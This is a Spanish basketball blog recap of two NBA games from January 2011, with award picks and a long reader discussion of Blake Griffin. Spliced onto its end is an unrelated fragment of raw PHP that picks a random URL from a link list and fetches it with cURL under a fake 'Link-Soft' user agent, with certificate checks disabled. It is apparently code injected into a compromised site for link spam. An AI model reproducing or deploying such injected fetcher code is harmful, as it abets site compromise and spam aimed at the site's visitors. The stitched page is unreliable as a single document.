La crónica (18/01/2011)

19 de January de 2011 por TheDeerHunter

Jornada light para desengrasarnos del intenso día Martin Luther King, que nos dejó ayer tan alucinados. Tan sólo dos choques pero bastante emocionantes.

Se había llegado a especular con que ninguno de los “Beach boys” iba a llegar sano al partido contra Atlanta. Menudo panorama hubiera sido con Eddie House, Jimmy Jones y Joel Anthony en lugar de Wade, LeBron & Bosh. Al final sólo se quedó en el dique seco el ex de Toronto, pero tampoco es que les aprovechara demasiado los 50 tiros (de un total de 77) que se lanzaron entre las dos estrellas, con feos porcentajes, y 6 balones que perdieron por cabeza. Pero ayer tocaban mandarinas y los Hawks intentaron imitarles. 0 de 6 en triples de Joe Johnson, 0 de 3 de Josh Smith, 1 de 5 de Maurice Evans… 7 de 30 para unos y 7 de 31 para otros. Cracks!!!
En definitiva, que el partido fue feo de solemnidad y con prórroga y todo nadie llegó a los 100 puntos. Se lo llevó el menos malo que fue Atlanta y los Heat acumulan 4 derrotas consecutivas.

Los que también se vieron afectados por las bajas, en su caso para perder una racha positiva fueron los Bulls. El duelo también fue feo pero emocionante, resolviéndose en la última jugada. Sin Boozer, la impresionante actuación de Rose no fue suficiente porque sus compañeros estuvieron especialmente desacertados. Los Bobcats se llevaron el gato al agua maximizando su juego en equipo. Como anécdota añadir que ganaron con un excepcional 0 de 13 en triples (mal número) No fue el día de los tiradores.

MVP: Hoy resulta difícil elegir a un MVP por incomparecencia. Apenas nadie cuajó un gran partido de entre los equipos que ganaron. Fue una jornada más de deméritos. Si acaso podemos salvar a Jamal Crawford desde el banco de los Hawks, con 19 puntos, 5 rebotes, 3 asistencias y, lo más sorprendente para lo que se cocía anoche, buenos porcentajes de tiro.

El rookie: Y nunca mejor dicho porque sólo vimos a uno y no durante demasiado tiempo. Omer Asik jugó 4 minutitos y le dió tiempo a coger 2 rebotes y a hacer una falta. Hoy dejamos desierto el premio.

La sorpresa: Por decir algo la titularidad de Joel Anthony y su oscuro trabajo de especialista. 16 rebotes y 3 tapones para el guerrillero canadiense. Eso sí, ni un sólo lanzamiento a canasta intentado. En buena lógica seguramente.

La decepción: El desacierto general desde la línea de tres. 20 de 86 lanzamientos.

El mayor esfuerzo en vano: La mejor actuación individual de la jornada fue la de Derrick Rose. 33 puntos, 5 rebotes y 4 asistencias. Difícil registrar pases de canasta cuando no hay nadie que esté dispuesto a aprovecharlos.

Comenta

16 comentarios a esta entrada

  1. Rompe dice:
    #1

    Triste jornada sí… Como MVP hubiera elegido a alguno que se quedó sin él en la jornada de ayer!

    Quitando los tres que todos conocemos, hay alguno en Miami que pudiera ser titular en algún otro equipo? xD. Y otra cosilla, por qué juega tan poco Ilgauskas? Que es casi que lo mejor del resto…

      Citar

  2. Busky23 dice:
    #2

    A pesar de la triste actuacion ayer de casi todo el equipo(aunque se llevaron la victoria que a fin de cuentas es lo que vale),se puede considerar de bastante buena la primera mitad de temporada de Atlanta,J.Johnson esta en el mejor momento de la temporada,Crawford en plan mejor sexto hombre,y Josh Smith y Al Horford forman una gran pareja interior,el solar que les impedirá llegar lejos en playoffs es el puesto de base,hoy Bibbi cero asistencias en  36 minutos.
    30 tiros que se ha cascao hoy Lebron!!!!,tenía mono???

    Ya empiezan a aflorar las primeras criticas-envidias hacia Griffin,debe ser duro que un tipo que lleva 3 meses en la liga te destroze por todos sitios.
    Yo no lo veo un jugador provocador ni mucho menos.
    Que jugador Rose,temporadon!

      Citar

  3. TheDeerHunter dice:
    #3

    ¿a qué te refieres con las críticas-envidias hacia griffin?

      Citar

  4. Busky23 dice:
    #4

    Por ejemplo esta semana hemos visto la tangana con Odom,ayer el desplante de Posey al negarse a darle la mano al final del partido…incluso las palabras de Gasol “No desarrolla muchos movimientos, trata de ganarte la espalda o saltar sobre ti”.

      Citar

  5. TheDeerHunter dice:
    #5

    Pero es que esa definición de Gasol es lo más exacta que he oido al respecto. Es un jugador absolutamente directo. No tiene tantos recursos técnicos como parecen indicar sus números. Lo que tiene es un poderío asombroso y una confianza temible.

      Citar

  6. busky23 dice:
    #6

    Hombre Deer,es evidente que gran parte de su juego se basa en el fisico,pero decir que solo te gana la espalda y te salta por encima me parece bastante injusto,para muestra el partido de ayer,donde las metio de todos los colores.
    Acaba de empezar y tiene un margen de mejora enorme,de ahi que me pregunte de que será capaz este tio cuando empiece a incorporar nuevos aspectos a su juego.

      Citar

  7. MagicJohnson32 dice:
    #7

    Cómo mola el karma. Desde el famoso tweet los Heat están 0-4, jojo.

      Citar

  8. TheDeerHunter dice:
    #8

    Las metió de todos los colores… pero sin ir más lejos tuvo la fortuna de anotar varios lanzamientos de media distancia cuando no es ni de lejos fiable más allá de 3 metros lejos del aro (por no decir 30cm)
    Le queda mucho por aprender, lo cual tampoco quiere decir que no lo vaya a hacer. Estoy de acuerdo conque tiene las mejores condiciones posibles para no sólo triunfar, sino para convertirse en algo muy grande… pero me parece que es exagerado ponerle ahora mismo incluso por encima de los más grandes en su posición.

    No me parece mal compararlo con cualquiera siempre que no perdamos de vista la perspectiva. Barkley era jodidamente bueno y su variedad de recursos ni en sus mejores sueños los tiene todavía Griffin. Si algún día los llega a adquirir igual estaríamos ante el mejor jugador de la historia. Yo dudo bastante todo eso y no es crítica/envidia. Es respeto a lo que ya está escrito/demostrado y a lo que queda por escribir/demostrar.

      Citar

  9. KB # 24 dice:
    #9

    Griffin tiene una buena pinta increíble! Tiene que trabajar el tiro de media distancia, sus % en TL y su juego de pies, a partir de ahi podrá ir creciendo y sus porcentajes también lo harán. Quizás con los años sepa leer mejor el juego y aumentar sus asistencias, ya que pronto los equipos le harán defensas de 2a1 en cada jugada.

    Respecto a lo que dice Gasol, de momento Griffin ya tiene suficiente con saltarte por encima y jugarte de espaldas (Gasol recuerdo que el partido que jugo contra vosotros se te comío literalmente!)

      Citar

  10. TheDeerHunter dice:
    #10

    Phil ha optado poner a Odom sobre Griffin en la medida de lo posible.
    Tampoco es ninguna sorpresa que a Gasol le van mal los jugadores tan físicos y que opta a no plantar mucha batalla en guerras insípidas como un partido de regular. Se lo puede permitir y creo que hace bien. El objetivo es otro y él no es ninguna roca.
    Dudo que el comentario sea un ataque… pero sí, de momento a Griffin le sobra con buscar la espalda o saltarte por encima.

      Citar

  11. sergio dice:
    #11

    Griffin supongo que tiene lo que tiene que tener ahora mismo: fisico, actitud, etica de trabajo (quiza lo mas importante… y que se ha podido ver en su recuperacion), capacidad de liderazgo, intimidación y una gran capacidad de mejora. Todos los jugadores mejoran su porcentaje de tiros segun pasan los años. Lo que si es una pena es la falta de recursos en el poste bajo (especialmente movimiento de pies) con la velocidad y capacidad de salto que tiene…. aunq tampoco tengo dudas de q trabajara en ello.

      Citar

  12. Sancho88 dice:
    #12

    Hombre, precisamente algo bueno que tiene Griffin es su juego de espaldas de cara al aro, con los reversos rapidísimos que hace por potencia. Ahí es indefendible. Como decías, solo Odom en una noche inspirada podría pararlo. Y bueno, lógicamente tendrá que mejorar su tiro exterior, porque realmente el chaval se juega el físico casi en cada canasta que anota. así no durará muchas temporadas. por eso hice la comparación ayer con Lebron, porque su tiro ha mejorado muchísimo y ya no abusa tanto de las entradas con potencia hacia canasta, sino que busca sus propios tiros aprovechando los cortes y los bloqueos de sus compañeros.

    De todas formas, comparto lo que dice DeerHunter, es su primera temporada y aún es pronto para hacer valoraciones fiables, ni con Barkley, ni con nadie. Me baso en el rookie del año pasado, Tyreke Evans. Temporadón sin duda, primer tío desde muchísimo tiempo en hacer una temporada de debut en 20-5-5, con unos fundamentos bestiales entrando a canasta, espectacularidad, etc. Pero le fallaba el tiro exterior y todo el mundo coincidía en que para verlo crecer esta temporada era necesario que mejorara ahí. Y no lo ha hecho, sus porcentajes siguen moviéndose en torno al 30 por ciento y las defensas saben como evitar sus puntos por penetración.

    Entonces, ese puede ser el problema, y por eso debemos de ser cautos con Griffin.

    Comentando lo de anoche… partidos absolutamente malos. Yo me tragué el de Miami. Los rebotes de Anthony (8 en ataque), se producen casi todos buscando el balón después de una castaña pilonga de Lebron o Wade. No tiró porque, sencillamente, los Heat no sé si meterían 5 balones a la zona en todo el partido. Casi el más inspirado fue Eddie House, pero jugó poco. Ilgauskas, efectivamente, debería jugar más, ante la mediocridad del juego interior de Miami – Lo de Dampier es de chiste-, y por lo menos el lituano tiene buena mano, es inteligente y sabe buscar a sus compañeros, pone grandes bloqueos… no sé muchas cosas que justifican que juegue más de 12 putos minutos.

    Y después, no sé si es acertado darle el mvp a Crawford, sinceramente. Su primera parte fue también una verguenza, haciendo faltas ridículas y sin meter nada, lo sentó su entrenador por incompetencia. Vale que en la segunda parte hizo algo más, pero no para llevarse el MVP. Miami perdió por suicidio colectivo desde fuera.

    Yo le hubiera dado el MVP a Rose, a pesar de perder. Hizo de todo el chiquillo, y este sí que ha mejorado un montón con respecto al año pasado. Llega y tira con confianza, las clava de tres… increíble. Pero claro, se vio muy solo. Comprendo que al perder no se lo haya llevado él.

      Citar

  13. Busky23 dice:
    #13

    No soy amante de las comparaciones,cada jugador es como es y escribe su propia historia,ya iremos viendo hasta donde llega este Griffin,por cierto,esta noche se enfrenta a Kevin Love,la otra sensación de la temporada.
    Yo tampoco creo que las palabras de Pau sean un ataque,si hay alguien respetuoso en esta liga es él.
    Otro más que cae en Portland,ahora le ha tocado a Marcus Camby,baja por tiempo indefinido.

      Citar

  14. MagicJohnson32 dice:
    #14

    Disfrutemos de Griffin mientras dure, porque como dice Sancho88, se juega la vida en cada acción. Un día se va a matar (o, para el caso, se va a romper la pierna). Yo creo que en todos los partidos que le he visto me ha dado algún susto en forma de batacazo.

    Y por su mecánica de lanzamiento, creo que tiene potencial para desarrollar un tiro de media distancia bastante fiable.

      Citar

  15. Rompe dice:
    #15

    Yo le daría el MVP a LaMarcus Aldridge, pero el MVP de la temporada! Menudo lo que tiene que aguantar el chaval, con todos sus compañeros lesionados o renqueantes, pegándose en la zona más solo que la una (más ahora sin Camby) y siempre dando el callo. Una pena que no sea más mediático… Menudo jugadorazo!

      Citar

  16. nacho dice:
    #16

    @KB Griffin no hizo un spectacular partido que digamos contra Lakers, y cuando metió sus puntos en el 3º cuarto, Pau no estaba en cancha.
    A mí no es que me caiga mal el muchacho (como si lo hace LeBron) pero este tipo de jugadores me aburren. Mucho físico mucha Hostia, Para concursos de mates, 3×3 callejeros y eso molan, pero si la liga deviene en eso yo me borro. Disfruto mucho más con tipos como Duncan, Manudo, Rondo, Allen, Gasol, Kobe, Deron…
    Hombre, solo le he visto un partido y medio y tampoco me enseñó nada, salvo que es un jodido portento físico, y para resumenes mola un montón. Eso sí tiene un margen espectacular, y si logra combinar ambos aspectos puede marcar época. Pero está por ver.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>